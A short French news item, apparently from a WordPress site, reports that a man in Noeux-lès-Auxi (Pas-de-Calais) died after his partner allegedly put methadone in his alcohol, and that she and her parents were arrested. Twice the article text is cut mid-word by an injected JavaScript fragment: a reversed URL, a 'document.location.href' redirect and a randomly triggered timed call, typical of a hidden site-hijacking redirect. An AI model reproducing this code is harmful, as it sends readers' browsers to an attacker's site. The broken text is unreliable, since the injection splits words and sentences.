FAITS DIVERS

Pas-de-Calais : un homme empoisonné pour la Saint-Valentin

Une jeune fille et ses parents ont été emmenés en garde à vue mercredi dans le Pas-de-Calais après qu’un homme a trouvé la mort par empoisonnement.

Les pompiers du petit village de Noeux-lès-Auxi dans le Pas-de-Calais ont été alertés tôt mercredi matin d’un incident. Alors qu’il allait célébrer la Saint-Valentin, un homme de 29 ans a été retrouvé inanimé dans son toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domicile, visiblement empoisonné par sa compagne. Selon Europe 1, une violente dispute aurait éclaté entre le couple dans la nuit de mardi à mercredi. La jeune femme aurait alors versé de la méthatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}done dans la bouteille d’alcool de son compagnon. Transporté en urgence par les pompiers, le jeune homme est mort à l’hôpital.

Des “incohérences” dans leurs déclarations

Selon la radio, les soupçons se sont rapidement portés sur sa compagne, réfugiée chez ses parents. Ils ont été rapidement localisés et arrêtés par la gendarmerie de Saint-Pol-sur-Ternoise. Leurs premières auditions confirmeraient la thèse d’un empoisonnement volontaire : «On a remarqué des incohérences dans leurs déclarations», a indiqué la gendarmerie à France 3. Selon la chaîne de télévision, la jeune femme venait de perdre son emploi et son permis de conduire. Le couple vivait dans ce village depuis un an, avec leurs deux enfants âgés de 2 ans et demi et de 7 mois.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

%d blogueurs aiment cette page :